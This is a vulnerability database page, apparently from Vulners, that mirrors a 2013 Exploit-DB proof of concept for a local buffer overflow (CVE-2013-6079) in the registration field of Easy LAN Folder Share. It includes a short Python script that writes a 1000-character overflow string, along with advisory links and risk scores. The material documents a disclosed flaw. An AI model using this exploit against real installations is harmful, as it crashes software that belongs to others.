Lucene search
+L

Easy LAN Folder Share 3.2.0.100 - Buffer Overflow

🗓️ 14 Jun 2013 00:00:00Reported by ariaratType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

Easy LAN Folder Share 3.2.0.100 Buffer Overflow vulnerability in Registration Code fiel

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2013-6079
14 Jun 201300:00
circl
Check Point Advisories
MostGear Soft EasyLan Folder Share 320100 Activation Denial of Service - Ver2 (CVE-2013-6079)
28 Dec 201400:00
checkpoint_advisories
CVE
CVE-2013-6079
11 Oct 201322:00
cve
Cvelist
CVE-2013-6079
11 Oct 201322:00
cvelist
Exploit DB
Easy LAN Folder Share 3.2.0.100 - Local Buffer Overflow (SEH)
3 Aug 201300:00
exploitdb
EUVD
EUVD-2013-5908
7 Oct 202500:30
euvd
NVD
CVE-2013-6079
11 Oct 201322:55
nvd
Prion
Buffer overflow
11 Oct 201322:55
prion
RedhatCVE
CVE-2013-6079
7 Jan 202609:50
redhatcve
# Exploit Title: Easy LAN Folder Share Version 3.2.0.100 Buffer Overflow vulnerability(SEH)
# Date: 14-06-2013
# Exploit Author: ariarat
# Vendor Homepage: http://www.mostgear.com
# Software Link: http://download.cnet.com/Easy-LAN-Folder-Share/3000-2085_4-10909166.html
# Version: 3.2.0.100
# Tested on: [ Windows 7 & windows XP sp2,sp3]
#============================================================================================
# After creating txt file,open created file and copy the AAA... string to clipboard and
# then paste in "Register -> Activate License -> Registration Code" section.
# ** type any character in User Name text field.
#
#============================================================================================
# Contact :
#------------------
# Web Page : http://ariarat.blogspot.com
# Email    : [email protected]
#============================================================================================

#!/usr/bin/python

filename="string.txt"
buffer = "\x41" * 1000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Jun 2013 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.2
EPSS0.0127
29